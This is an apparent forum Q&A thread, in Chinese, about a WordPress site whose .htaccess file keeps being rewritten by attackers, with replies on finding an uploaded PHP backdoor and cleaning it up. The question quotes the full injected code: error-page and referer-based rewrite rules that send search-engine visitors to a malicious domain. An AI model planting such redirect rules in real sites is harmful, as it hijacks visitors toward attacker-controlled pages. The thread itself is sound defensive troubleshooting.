我被难住了。我客户的 wordpress 网站的 .htaccess 文件一直被黑客入侵。它添加代码将所有来自搜索引擎的流量重定向到不同的网站。它不断更改重定向到的域名。目前(不要访问此网站!prime-vermond.ru)
我已经更改了 ftp 密码、wordpress 管理员密码、更新了所有插件、删除了未使用的插件、将 .htaccess 文件的文件权限更改为 444。
我在想这可能是服务器漏洞?客户网站托管在 godaddy。我给他们发了好几封电子邮件,等待我最新的支持单的回复。
我搜索了所有文件,寻找其中可能包含恶意代码的内容,但一无所获。我假设他们有经过 base64 编码的代码,并使用 eval 来运行它。
关于如何更好地找到修改过的坏文件,有什么想法吗?我现在不知所措 =/
以下是添加到 .htaccess 文件的完整代码
ErrorDocument 400 http://prime-vermond.ru/trast/index.php
ErrorDocument 401 http://prime-vermond.ru/trast/index.php
ErrorDocument 403 http://prime-vermond.ru/trast/index.php
ErrorDocument 404 http://prime-vermond.ru/trast/index.php
ErrorDocument 500 http://prime-vermond.ru/trast/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]
答案1
您的应用程序代码可能被利用,或者有人已盗用/猜测您的帐户凭据。请确保您的 wp 代码(包括所有插件)是最新的,并确保更改您的帐户密码。
答案2
将所有可能的日志选项设置为开启。等待它再次发生。然后记下文件的最后修改时间,然后检查访问/错误日志以查看当时是否发生了任何异常情况。
答案3
我遇到了同样的问题,这是我们的解决方案。
背景
在我们的一个 cms 安装中存在安全漏洞,在我们的案例中,我们使用的是一个用于测试的 joomla 1.6 的 alpha 版本,但却无人关心... 无论它是哪个 alpha 版本,现在都有一个已发布的、更安全的版本 (1.7) :P。
这个漏洞是由文件/图片上传代码产生的。cms 的这个部分没有验证任何内容,因此任何人都可以上传任何类型的文件(在我们的例子中是 php 文件)并通过调用该文件在外部执行。
php 文件(在我们的例子中)被上传到图像目录,特别是所有文章都可以访问的文件夹,在我们的例子中,这个特定的安装是domain.com/images/stories/。
此 php 代码扫描所有 apache 配置文件 (.htaccess) 并添加您上面描述的规则。代码逐级跳转,直到无法获得读写权限,将此代码添加到按级别找到的任何 .htaccess 文件中,如果不存在则创建该文件。
即使您删除或替换 .htaccess 文件,这些文件也会通过执行 php 代码再次创建或修改(在我们的例子中是每小时一次)。
解决方案
我们开始使用修改日期来追踪文件,并按最近修改的内容进行筛选。我们使用 .htaccess 文件(最近修改的)作为面包屑来查找源。
如果您有权访问 shell,这会更容易,否则,通过上次修改的文件夹进行检查,您会在每个子文件夹中找到一个 .htaccess 文件。您基本上会得到一些具有最近日期的 php 文件,并且可能具有公共访问的可执行权限(0606 或类似权限)。
如果您尝试下载此代码,您的防病毒软件将会弹出警告,在我们的例子中,Avira 会显示针对 Trojan - Backdoor PHP/C99shell.B 的警告,所以不要担心。
但是如果您非常好奇,那么请将扩展名更改为其他内容和/或将其打包以下载...或暂时禁用您的防病毒软件,但这取决于您。
无论如何,一旦您找到这个/这些文件,请删除它们并更新您的系统,或者卸载(就像我们做的那样)如果需要填补安全漏洞。
希望这对某人有帮助!:D